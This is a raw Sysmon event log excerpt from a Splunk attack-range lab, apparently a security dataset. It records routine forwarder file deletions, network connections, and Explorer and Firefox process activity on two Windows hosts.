23542300x80000000000000001053551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:02.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=358ABE9DF779E1EAD87C6578BE6558CA,SHA256=9128D76FD4A1A2C8C6123C1194E3541F0B6487537FEB7254F14D5985364A56D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:02.582{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F840C96C2F9DC09595D28CB4328A5FE,SHA256=C14E12F48E346FA62BE72851BFC8CE89B9009A6F82EE1CC6B0C4F604F8835BA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61929-false10.0.1.12-8000- 23542300x80000000000000001053554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:03.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BE795CAC3EA7E3D1BA3001BBC006F4,SHA256=2E28BBE1FD6AF9BEDF506D7FAB70C79CEA48A3DA81CDEC878F3DF055143112BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:02.215{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57428-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:03.613{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA2312DF8A34B5F5ED5820322C343057,SHA256=76641C619B9BE79E6B404FC721F3EB92C37C8021CF05AB37C58FBC87E2594388,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:03.415{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:03.415{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:04.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D962B5F48C4F943E98D174E9F5C81139,SHA256=7DDE7AC82DB9B6B64B9B167F1ECCD510D16E581C457FD972E5A966A7D7E9F2E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:04.644{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8546E9DD3B010A8935B86496A7FEBD2F,SHA256=4979C1498C3A520698CAD599B718B8ACE9A9B754EE97F4548A22A6E0F39E4DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:05.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62557A27391DA47D6688EB99EB47A99F,SHA256=F39BC03F34E01E551E62C90F4E4B4B39E396286F76DBDD6DF58687EBD24CDAB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:05.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66E7FD3449F7DACD3A364C123F432C4D,SHA256=B40D049F76C3C0CCD393C58E7E57E9BFEF363F8667A81B1A2BA109FC6F695A00,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:57.834{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-44383-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001053557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:05.615{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F17C06D07CD5521ACCE31B80716B838,SHA256=FA52F1B9172ACD20F360A08E7E549B3D88640A4D68BF80821ABE88500EF2B693,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:05.615{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12B31FEDC1296B93BA06DC20CB13F0FC,SHA256=3362899E715BEE37B199A03AC476187AA5EEBF210593AC976727811CFFFC166F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.782{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE93B4ED174FD9812B2B2753A3E3E986,SHA256=F7A2093581869DC9EEE617E2EF85E93F0B3C43EF4353A6A0E3B49D0BD1FA83F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:06.691{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FBD6FE1E2A9955086109FBF24793D69,SHA256=2530B04420B4D9AAFC1A2E70E4D4134AE777829AE0740BBA24BD29E9492A3F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.451{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.398{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001053562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.398{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001053561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:05:06.398{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.375.114763493C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001053560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:05:06.398{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.375.114763493C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001053568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:07.797{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB5C3EBA640E3303F3AD88ED424B07AE,SHA256=4EF0CFEF7FDC27F9D1C8E760851A733EF8D13A75ACFA3B900B963E333960BCA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:07.691{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C6E20A8A7FD1B200A8CD3F1CE481B4,SHA256=AC9E3CC60773C3E2CEAB2620BD501E6F0DF6B25E45A3E11E5322D1BFEF732B5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:59.931{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58941- 354300x80000000000000001053566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:59.613{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61930-false10.0.1.12-8000- 23542300x80000000000000001053569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:08.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065636DAE89FD69E64B33B2AC4252F46,SHA256=779E04C6E69F24BBCF2818345B6AA915F8E21A627DC813BCB81C2AC82AB6CDED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:08.707{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46C2E5BC6F2C14DF3D7903B98D8F6F6,SHA256=5CE091898CABD9FB582B432BC07E72EE6F2288B7B84F0BCE22D362DADFE1BFC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.831{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E67E5DBA0D8C8B3A77A8AFAA9CDFAF8,SHA256=F6E9DF388FEC846672CA811088D25CD6B68D71D9B674772E9C6E72CF61D20506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:09.707{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFC3BFC1D593269134E8954D7525F165,SHA256=6EC1949B77A399413C59D394671A66F0C612EC1F28EC0EA8A02E6D528F81D04A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.734{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.734{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000809880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:07.386{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57429-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:10.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBA98BC0031E6F165C35A1F3A17682F6,SHA256=01DEA3799E0224F9820D59D7F38EA61F0D9D72E9E6D80452453C99F312CBF4C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:10.738{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D1E344938452F9D9F5853CDEA574C93,SHA256=0A52FADCADCB8E3C2F027D10D82E96B0EC564CE695000A6431300DAB4A66E452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:11.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A4B361FD91E70DEB2284DCAFF026807,SHA256=4BBB2C0E582E5E9389458593B8444D1397C00B3BD3281BC290657C9E1C804AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:11.754{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649FC8C8B1AA80F374EE24FA206C4235,SHA256=AD121A3E5B2A6556E5C11B4D0A0B059F633A4536FF5CF098AA50C9AE3F884330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:12.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E82AC534FDCEF82423BA77D9901B18DB,SHA256=3143B45D6A1F953EA158DEEE2679B248507E7282316AF6B0D3BF4919D4DA1F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:12.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5319E4B14C6B7B9BF637F558547CDCD1,SHA256=C89F557AB7B437BD11D56E919525028B2159FD38F17A69848EFAC2F42BC5984A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:04.740{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61931-false10.0.1.12-8000- 11241100x80000000000000001053576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:12.427{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001053575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:12.427{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=EAC00340AC839AE659EF516C4D6D225C,SHA256=0BEAC18B03086B120E18A44261269CA109BEEF4362A8A594ED7E8E6A7109BC5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:13.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D15F8D1CCC7FF5D3B2518C5D51BB721,SHA256=3273F306BDA7D927D458BD1D53377CFFEE7C79B59C4D1847D2C14C20DBD70D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:13.816{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C911FECB19E982468DFEB4551D4EB69,SHA256=4C0E394F798267ECA635CBC2F962B6D9622B0805A3BF80A9997E57C9DBF504D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:14.851{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B638606BA664673CB526E73E4387EA50,SHA256=C9E625FE0E470385D37C0C9FF0CE13F94A818EA1BC714BFA401C5D6CC9115EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:14.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA1E11607CA02D5F1B4039EC33BEF276,SHA256=CA2EE3D53BBCF1042FB77376327C9EE11753F4FD8C087CF219C2E4002872655B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:15.882{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E6214D620EF48A400B046A75AC14167,SHA256=35663B74AB89337B8D7E1917E9CF5E4037C07E9B7C423AC9ADC130154839F354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.933{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 